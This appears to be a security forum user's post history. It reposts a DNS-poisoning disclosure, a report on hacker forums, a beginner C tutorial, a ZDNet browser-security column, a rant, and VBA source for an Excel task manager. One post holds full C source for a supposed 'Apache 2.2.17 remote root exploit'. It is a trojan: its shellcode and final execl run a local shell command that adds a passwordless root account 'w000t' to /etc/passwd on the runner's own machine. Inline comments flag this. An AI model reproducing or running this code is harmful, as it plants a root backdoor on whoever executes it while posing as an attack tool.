Everything posted by Nytro
-
DNS Poisoning via Port Exhaustion

Hey,

Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers. It discloses two vulnerabilities:

1. A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. This vulnerability can be triggered when opening a malicious webpage. A successful exploitation of this vulnerability may lead to disclosure and manipulation of cookies and web pages, disclosure of NTLM credentials and clipboard data of the logged-on user, and even firewall bypass.

2. A vulnerability in multiuser Windows environments which enables local DNS cache poisoning of arbitrary domains. This vulnerability can be triggered by a normal user (i.e. one with non-administrative rights) in order to attack other users of the system. A successful exploitation of this vulnerability may lead to information disclosure, privilege escalation, universal XSS and more.

Whitepaper: http://bit.ly/q31wSq
A blog post with video demos: IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion
Download: http://blog.watchfire.com/files/dnsp_port_exhaustion.pdf

Roee Hay <roeeh () il ibm com>, IBM Rational Application Security Research Group
Yair Amit <yairam () gmail com>

Source: Full Disclosure: DNS Poisoning via Port Exhaustion
-
Apache 2.2.17 remote root exploit

/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you ~ desg */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>   /* added: wait() below was used without its header */
#include <netinet/in.h>
#include <arpa/inet.h>

/* Besides being copied into the request buffer, "evil" is also executed
 * locally: after a short x86 stub it carries the text
 * "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd",
 * and the fork()/execl() at the end of main() hands this same buffer to
 * the local /bin/sh -c, i.e. on the machine of whoever compiles and runs
 * this file, not on the "target". */
char evil[] =
    "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
    "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
    "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
    "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
    "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
    "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
    "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
    "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
    "\x44\x44";

#define NOP 0x90
#define BSIZE 1000
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    if (argc != 2) {
        printf("%s <target>\n", argv[0]);
        exit(1);
    }
    buffer = (char *) malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0';

    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("no such server\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }

    printf("sending exploit code...\n");
    /* send() returns the number of bytes sent, so comparing it against 1
     * reports "successful" for practically any connection. */
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("exploit was successful!\n");
    else
        printf("sorry, this site isn't vulnerable\n");

    printf("waiting for shell.....\n");
    /* runs the "evil" buffer through the LOCAL shell, see the comment above */
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", evil, 0);
    else
        wait(NULL);
    while (1) {
        /* shell */
    }
}

Or: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.com

Discussion here, it may not be an exploit: Full Disclosure: Apache 2.2.17 exploit?
-
Analysis of 250,000 hacker conversations
Posted on 17 October 2011.

Imperva released a report analyzing the content and activities of an online hacker forum with nearly 220,000 registered members, although many are dormant. This forum is used by hackers for training, communications, collaboration, recruitment, commerce and even social interaction. Commercially, this forum serves as a marketplace for selling stolen data and attack software. The chat rooms are filled with technical subjects ranging from advice on attack planning to solicitations for help with specific campaigns. This forum is also a place where curious neophytes can find "how-to-hack" tutorials on various methods. The report not only provides insight into hacker psychology, but also details the technical strategies they learn, develop and deploy.

"Studying hacker forums is important to providing insights into hacker psychology and technical strategies," explained Imperva CTO Amichai Shulman. "Hacker forums are still not well understood by many in the security community, and we believe that studying and quantifying what happens in these online communities can lead to the development of strategies to combat cybercrime."

The findings include:

Examples of hacker communications, collaboration, recruitment, commerce and social interaction activities.

Attack discussions on this forum increased over the four-year period of analysis, growing an average of 157% year over year between 2007 and 2010.

The most discussed topics in this forum from June 2010 to June 2011 were DoS/DDoS attacks, with 22% of discussions, followed by SQL injections, which comprised 19% of all discussions.

25% of discussions from June 2010 to June 2011 focused on "beginning" hacking, with members devoting 6% of their time to sharing "how-to" tutorials and discussing basic methodologies, indicating a strong, steady interest from new talent.

Mobile hacking has seen very strong growth in this forum from 2007 to 2010, with iPhone hacking leading the way.

The complete report is available here: http://www.net-security.org/dl/articles/Imperva_Oct2011.pdf

Source: Analysis of 250,000 hacker conversations
-
C development on Linux - Introduction - I.
Category: Linux Development
Published on Monday, 17 October 2011 13:26

Contents
1. Introduction
1.1. Why C?
2. About C
2.1. History
2.2. Classification
2.3. Our approach
3. The necessary tools
4. The compilation process
5. Example C program
6. Conclusion

1. Introduction

What you're just reading is the beginning of a series of articles dedicated to development on Linux systems. However, with minor modifications (if any), you will be able to use the knowledge you will get by reading our series on any other system that uses the same tools (OpenIndiana, BSD...). This first article will deal gradually with the intricacies of writing C code on Linux. You are expected to have basic programming knowledge, either on Linux/Unix systems or on other platforms. The idea is that you should know the basics of programming, like what a variable is or how to define a structure. Even though you will get this information from this article, we won't insist very much on beginner-level concepts. A word of warning: we won't include everything there is to tell about C, because that would take lots of space and of course, we don't actually know everything about C.

1.1. Why C?

Some of you might argue that C is not the best beginner-level language ever. Agreed, but again, you're expected to have some basic programming knowledge, for one. Second, C and Unix, and Linux afterwards, are so intimately tied together that it only seemed natural to start our development series with C. From the kernel, a substantial part of which is written in C, to lots of everyday user-land applications, C is used massively on your Linux system. For example, GTK is based on C, so if you're using Gnome or XFCE applications, you're using C-based applications. C is an old, well-established programming language, a vital tool in many parts of the IT world, from embedded systems to mainframes. Therefore, it is only fair to assume that C skills will not only enrich your CV, but they will also help you to solve many issues on your Linux system, that is, only if you take this seriously and practice a lot by reading and writing C code.

2. About C

2.1. History

C is more than 40 years old, with beginnings at Bell Labs with Brian Kernighan, Dennis Ritchie and Ken Thompson as the "usual suspects." Unix development and C's evolution are intimately linked, as we said, because Unix was initially written in assembly, but that had lots of shortcomings. Therefore, when moving to the PDP-11 as the main hardware platform, the developers started C as a core language for Unix. In 1978, Kernighan and Ritchie wrote "The C Programming Language," a book that is today as it was 20 years ago: THE book on C programming. We heartily recommend you get it.

2.2. Classification

There are always people keen on classification of things and of course, programming is no different. Joking aside, since we're at the beginning, we thought you should know that C is a procedural structured programming language, with weak typing. What we just said, in English, is that C uses procedures (the usual name used by C programmers, and the one we'll use as well, is functions however), that it uses a structured approach (think blocks of code) and finally, it supports implicit type conversions. If you don't know what any of the above means, fear not, you'll find out!

2.3. Our approach

This article is just the introductory part and we will regularly publish the next parts, where each chapter will deal with an important part of the language: variables, pointers, structs, etc. (subscribe to RSS if you have not done so yet). At the end of the theoretical part, we will show you a practical example, for which we chose yest, a tiny piece of software written by Kimball Hawkins (thanks, Kimball). We will compile it, then package it for Debian and Fedora systems. Debian developer Andree Leidenfrost will then show you how to submit our new package to the Debian repository, making sure we respect all package requirements to be admitted to the Debian distribution (thanks, Andree). We recommend you try our examples on your system, take some time to examine the code and try to make modifications of your own.

3. The necessary tools

Before we begin, let us make sure we have all essential tools installed on your Linux system. You will need a compiler, namely gcc, the binutils package and a text editor or an IDE. Whether you choose a text editor or some sort of IDE depends largely on your preferences, but more on that later. Depending on your Linux distribution and the installation options you have used, you might already have the necessary tools installed. We put together a tiny script to help you see whether you have all mandatory development tools installed:

#!/bin/sh
gcc -v
if [ $? != 0 ]; then
    echo "GCC is not installed!"
fi
ld -v
if [ $? != 0 ]; then
    echo "Please install binutils!"
fi

Save this script as devtoolscheck.sh, run it:

$ sh devtoolscheck.sh

On my machine I get the following output:

$ sh devtools.sh
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.1-4' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=c,c++,fortran,objc,obj-c++,go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch [config options snipped]
Thread model: posix
gcc version 4.6.1 (Debian 4.6.1-4)
GNU ld (GNU Binutils for Debian) 2.21.52.20110606

Why you need binutils binaries and gcc, you will see shortly. Now let's focus a bit on the "editor vs IDE" question. The only thing we will advise you in this respect is "use what you feel comfortable with and disregard what others tell you". This matter is very subjective and it depends on many variables. For example, if you develop (or used to develop) on other operating systems, you might be used to an IDE. You will find many good IDEs on Linux, including Eclipse, Geany, KDevelop or Anjuta. Try installing them to see what you find more suitable. On the other hand, if you want to go the simple editor way, there are lots of options here as well: vi(m), emacs, kate, nano, jed and so on. By searching the Internet you will find a lot of discussions regarding what the best editor is. We say install a few of them and find out what suits you best. You are the only judge of this, and it will be a tool you will use frequently, so take your time, use it, read about it and get familiar with it. Regardless of your choice, we will assume that you have made your choice in regards to the editing tool and you are familiar with its use.

4. The compilation process

In simple words, this process is what starts from the source code you wrote and, if all goes well, the result is an executable binary or a library. Needless to say, there's more to it, but it is essential for you to understand the above sentence before you move on. You do not need to memorize all the concepts now as they will become clearer later. At this stage it's only important to get the general idea. Let's say we have the source code written and now we want a compiler to process it and give us the executable binary. The workflow of this process is illustrated on your right. Please note that this is applicable only to C, which is a compiled language, as opposed to interpreted languages (Perl, Python, Shell), and we will refer strictly to gcc and friends for the rest of our guide.

As the figure on your right illustrates, the preprocessor (cpp) takes your source code, looks for preprocessor instructions (in C, they start with a hash) and if everything looks right, the result is an output understandable by the compiler. The compiler (gcc) does all the hard work, including code optimization for the underlying hardware (if you are interested in compiler theory or cross-compilation, there are lots of good books on the subject, but we assume a more beginner level here). The result is assembly code, intimately close to the machine, from which the binaries will be generated (as is the tool). In the end, depending on the options and the code, "ld" will link the executable to all necessary libraries and voila! the end result: your program. If you want to see all the resulting intermediate files, the gcc flag -save-temps will help you do so. We recommend you read the gcc manual page, at least frugally, and make sure that your compiler is up to date. You will get used to the usual gcc flags by reading our examples, but you are expected to know what they do, not just copy and paste commands you see on the screen.

5. Example C program

Every self-respecting programming tutorial starts with a "Hello, world" program. This program does nothing else but print "Hello, world!" on the screen, then exits. It's used to illustrate the very basic structure of a program and some essential concepts. So, without further ado, here it is.

#include <stdio.h>

/* This is a comment */

int main()
{
    printf("Hello, world!\n");
    return 0;
}

Now, let us dissect the program line by line and see what each line represents. The first one is a preprocessor directive (see above) which asks for the stdio.h file, which provides the definition for the printf function. Header files are files that usually contain various definitions (functions, variables...) and make .c files less cluttered. All that a source file (.c) will need is an #include statement and possibly an argument to the linker. Everything that's defined in the included header file will be available in your source code.

main() is a mandatory function in every C program. As the name states, the main activity will happen here, regardless of how many functions you have defined. int main() means that this function does not have any arguments (the empty parentheses) and that it returns an integer (the initial int). All these will be discussed later. The most important thing here is the printf function, which takes our text as an argument and displays it. "\n" means "newline" and it's the equivalent of using the Enter key (or ^M). It is called an escape sequence and all escape sequences in C begin with "\". For example, to better understand what an escape sequence is, imagine you're writing HTML code and you need to print a "<" character. HTML's syntax uses angle brackets to define HTML tags, so chances are your bracket will be interpreted as HTML code instead of being displayed. So, what to do? We escape it with "&lt;" and it will appear properly. Just the same, if you want to insert a newline character, you can't type it directly, as the compiler could care less if you write your program on a single line or not, and therefore you need to escape your newline character with "\n".

return 0 tells the compiler that everything is ok and the execution of the main() function ends there. That is because 0 is the code for successful execution, while values greater than 0 (integers) are an indication that something went wrong. The curly braces that begin and end the main function delimit its execution block, that is, what happens in main(), stays in main(). You may have noticed the semicolons at the end of the statements: they are mandatory as a sign that the current statement ended there, but they are not to be used in preprocessor directives such as #include.

6. Conclusion

We hope we didn't cram too much information in your brain and that you will enjoy staying with us on this programming tutorial. Part 2 will be dealing with a comparison between C and other programming languages in order to help those who already have some experience in development. So make sure you are subscribed to our RSS feed so you'll know when part two arrives. Here's what you should expect:

I. C development on Linux - Introduction
II. Comparison between C and other programming languages
III. Types, operators, variables
IV. Flow control
V. Functions
VI. Pointers and arrays
VII. Structures
VIII. Basic I/O
IX. Coding style and recommendations
X. Building a program
XI. Packaging for Debian and Fedora
XII. Getting a package in the official Debian repositories

We reserve the right to alter the list at any time necessary. Seriously, although this is a rough overview of what's to come, we might change our mind regarding titles or subtopics, but the general idea will be as above.

[EDIT]: Today, 08.10.2011, marks the sad event of Dennis Ritchie passing away after a long struggle with illness. We cannot even begin to comprise the influence he had on the IT industry. Dennis, we owe you so much. This guide is dedicated to your memory. May you rest in peace.

About Author: Rares Aioanei
I've been using Linux/BSD since about 2003, passionate about everything that involves Linux/BSD and Free Software. Contributor to various FOSS projects and your average system administrator in everyday life.

Source: C development on Linux - Introduction - I.
-
Crap. Yet another of the thousands of pieces of junk circulating by mail/messenger or even Facebook. There is no good/evil, light/darkness; in fact not many of these things exist. For example, light doesn't exist; there are photons that propagate at the speed of light (in a vacuum), which on contact with matter (solid, to us) are "reflected", and reach the eyes of stupid people who go "Whoaaa, light from Gooood". And colours are just the different way these photons are "reflected" on contact with other surfaces, depending on the surface in question. The discussion is pathetic and was invented (I don't think I'm wrong in saying this) by a loser: a person who is clueless about both religion and science. God is neither good nor evil, he is neutral, if we can put it that way (religiously speaking, and as an example: the flood - work it out yourselves). And the thing with the five senses is, scientifically, illogical nonsense, used irrationally. "It uses electricity and magnetism, but NOBODY has seen or fully understood either of these two" Go stick your hands in the socket, kids with no future, something that doesn't exist can't kill you (it has no smell, no balls...). Anyway, one more piece of crap on earth, created for inept people. And Einstein is in there only for marketing; if that line weren't there, you wouldn't give a damn about this text.
-
I talked to him and it's about something serious. Please, no absurd and useless comments.
-
Internet Explorer is the safest Web browser!? Ha!
By Steven J. Vaughan-Nichols | October 12, 2011, 8:46am PDT

Summary: Microsoft is trying again to con people into thinking that Internet Explorer is the safest browser around. It's not. At best, it's tied with Chrome.

Microsoft has always been fond of paying analysts to say that its products are best, or having partners release reports showing how their rivals' products are second-rate, and, now, Web sites that "show" how Internet Explorer (IE) is better than Chrome and Firefox when it comes to security. Really? Didn't Microsoft just release yet another major Internet Explorer patch? I quote from the IE patch update (MS11-081), which applies to all currently supported versions of Microsoft Windows and Internet Explorer, and IE 6 as well:

"The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."

Yes, that includes IE 9, the best and most up-to-date IE, which is only available on Windows 7. Isn't it funny how Microsoft claims that IE 9 is the most secure of its browser family, but somehow it has to have the same problems fixed that exist in IE 6, 7, and 8? Could it be that it's really not that different after all from the rest of its historically insecure family?

If you go to Microsoft's Web browser security "test" site, Your Browser Matters, though, it will tell you that IE 9, with a score of four, is the most secure browser of all. Funny, it told me that it was the most secure both before and after the patch. As for the other browsers, it informs me that Firefox 7.01 only rates a 2, and Chrome 14 gets a 2.5. And these, I might add, were my scores on my Mint Linux desktop!

How can they produce such clearly nonsensical results? It's because they're setting the rules on what's important and what's not. So, for example, Microsoft gives IE full credit for its SmartScreen malware detection software. With SmartScreen, software that is signed with a digital certificate that Microsoft trusts is allowed to be saved or run. Chrome, on the other hand, blocks known malware, but lets you save unknown, potentially dangerous programs. On the other hand, if you do download malware with Chrome, the program is still stuck in a sandbox, where it has very limited abilities to actually attack your system. Besides that, Chrome automatically upgrades browser extensions as security fixes come out. Since programs like Adobe Flash are often used for attacks these days, and in Flash's case there have been 17 significant patches in the last 16 months, I think automatic security updates for Flash and other potential problem programs are a big deal. While Microsoft acknowledges that it doesn't provide these important features, it doesn't take away any points from its perfect score for lacking them. Interesting judgement call there, Microsoft.

Johnathan Nightingale, Mozilla's director of Firefox engineering, also has trouble with what factors Microsoft considers important and what it doesn't. "Mozilla is fiercely proud of our long track record of leadership on security. We believe that being safe on the Web means having a robust browser that defends against malware and phishing, includes new technologies to help sites and users secure themselves, and a responsive security team that gets security updates out quickly and reliably. Microsoft's site is more notable for the things it fails to include: security technologies like HSTS [HTTP Strict Transport Security], privacy tools like Do Not Track, and vendor response time when vulnerabilities are discovered," said Nightingale.

Exactly so. Firefox has long been a leader in browser security. True, Microsoft has gotten a lot better about security, but Firefox was doing it when the horribly unsafe IE 6 was still the best Microsoft could do. True, today you can make Windows and IE relatively safe. No, really, you can. All you have to do is constantly and regularly patch it. Those of us who use other operating systems, like Linux and Mac OS X, and alternative browsers such as Chrome and Firefox, can sit back and relax more.

Don't get me wrong. We must patch our software as well. As security guru Bruce Schneier points out, "Security is a process, not a product." Security also isn't something, though, that you measure by a Web site that, when you get down to it, simply checks to see whether the browser you're running is IE 9 or not. Deciding what's a secure Web browser is a lot more complicated than that. Personally, thanks to Chrome's auto-updating and sandboxing, I feel a lot safer running Chrome on Windows than I ever will running IE.

Source: http://www.zdnet.com/blog/networking/internet-explorer-is-the-safest-web-browser-ha/1546
-
TaskManager Runs on 64-bit Excel
Filed under: My Software - Didier Stevens @ 11:21

I'm releasing a new version of TaskManager.xls that runs on Excel 2010 64-bit too. The previous version ran on 64-bit Windows, provided you used Excel 32-bit. But this new version runs on both implementations of Excel.

Download: http://didierstevens.com/files/software/TaskManager_V0_1_0.zip

As you may know, Excel offers a Visual Basic Editor in which you can create macros using VB. It seems someone made a Task Manager. Well, for it to work, those macros have to run: Tools > Options > Security > Advanced and Low for Macro (I don't recommend it).

Source code:

' TaskManager.xls v0.1.0
' Non-exhaustive list of sources:
' http://www.ex-designz.net/apidetail.asp?api_id=351
' http://www.xtremevbtalk.com/archive/index.php/t-248755.html
' http://msdn.microsoft.com/en-us/library/ms684335%28v=vs.85%29.aspx
'
' http://didierstevens.com
' Use at your own risk
'
' Shortcommings, or todo's ;-)
'
' History:
' 2011/02/02: start
' 2011/02/04: v0.0.2 added GetTimes
' 2011/02/21: v0.0.3 added GetType
' 2011/02/22: added GetProcessFilename
' 2011/02/23: added AdjustTokenForDebug
' 2011/10/09: v0.1.0 added support for 64-bit Excel

Option Explicit

Private Const TH32CS_SNAPHEAPLIST = &H1
Private Const TH32CS_SNAPPROCESS = &H2
Private Const TH32CS_SNAPTHREAD = &H4
Private Const TH32CS_SNAPMODULE = &H8
Private Const TH32CS_INHERIT = &H80000000
Private Const MAX_PATH = 260
Private Const INVALID_HANDLE_VALUE = -1&
Private Const PROCESS_TERMINATE = &H1
Private Const PROCESS_QUERY_INFORMATION = &H400
Private Const PROCESS_VM_READ = &H10
Private Const THREAD_SUSPEND_RESUME = &H2
Private Const TOKEN_QUERY = &H8
Private Const TokenUser = 1
Private Const TOKEN_ADJUST_PRIVILEGES = &H20
Private Const SE_PRIVILEGE_ENABLED = &H2

#If Win64 Then
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32DefaultHeapIDB As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    pcPriClassBaseB As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
End Type
#Else
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
End Type
#End If

Private Type THREADENTRY32
    dwSize As Long
    cntUsage As Long
    th32ThreadID As Long
    rh32OwnerProcessID As Long
    tpBasePri As Long
    tpDeltaPri As Long
    dwFlags As Long
End Type

Private Type FILETIME
    dwLowDateTime As Long
    dwHighDateTime As Long
End Type

Private Type SYSTEMTIME
    wYear As Integer
    wMonth As Integer
    wDayOfWeek As Integer
    wDay As Integer
    wHour As Integer
    wMinute As Integer
    wSecond As Integer
    wMilliseconds As Integer
End Type

#If Win64 Then
Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    lpMinimumApplicationAddress As LongPtr
    lpMaximumApplicationAddress As LongPtr
    dwActiveProcessorMask As Long
    dwNumberOfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Long
    wProcessorRevision As Long
End Type
#Else
Private Type SYSTEM_INFO
    wProcessorArchitecture As Integer
    wReserved As Integer
    lpMinimumApplicationAddress As Long
    lpMaximumApplicationAddress As Long
    dwActiveProcessorMask As Long
    dwNumberOfProcessors As Long
    dwProcessorType As Long
    dwAllocationGranularity As Long
    wProcessorLevel As Long
    wProcessorRevision As Long
End Type
#End If

Private Type LUID
    lowpart As Long
    highpart As Long
End Type

Private Type TOKEN_PRIVILEGES
    PrivilegeCount As Long
    LuidUDT As LUID
    Attributes As Long
End Type

#If Win64 Then
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As LongLong, ByVal lProcessID As LongLong) As LongPtr
Private Declare PtrSafe Sub CloseHandle Lib "kernel32" (ByVal hPass As LongPtr)
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As LongPtr
Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Long) As Long
Private Declare PtrSafe Function Thread32First Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long
Private Declare PtrSafe Function Thread32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long
Private Declare PtrSafe Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As LongPtr
Private Declare PtrSafe Function SuspendThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer
Private Declare PtrSafe Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer
Private Declare PtrSafe Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As LongPtr, ByVal DesiredAccess As Long, ByRef TokenHandle As LongPtr) As Long
Private Declare PtrSafe Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As LongPtr, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As LongLong)
Private Declare PtrSafe Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long
Private Declare PtrSafe Function GetProcessTimes Lib "kernel32" (ByVal hProcess As LongPtr, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long
Private Declare PtrSafe Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Private Declare PtrSafe Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Private Declare PtrSafe Function IsWow64Process Lib "kernel32" (ByVal hProcess As LongPtr, ByRef Wow64Process As Long) As Long
Private Declare PtrSafe Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO)
Private Declare PtrSafe Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long
Private Declare PtrSafe Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long
Private Declare PtrSafe Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long
Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr
Private Declare PtrSafe Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare PtrSafe Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As LongPtr, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long
#Else
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function Thread32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long
Private Declare Function Thread32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long
Private Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As Long
Private Declare Function SuspendThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer
Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer
Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
Private Declare Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As Long)
Private Declare Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long
Private Declare Function GetProcessTimes Lib "kernel32" (ByVal hProcess As Long, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long
Private Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long
Private Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long
Private Declare Function IsWow64Process Lib "kernel32" (ByVal hProcess As Long, ByRef Wow64Process As Long) As Long
Private Declare Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO)
Private Declare Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
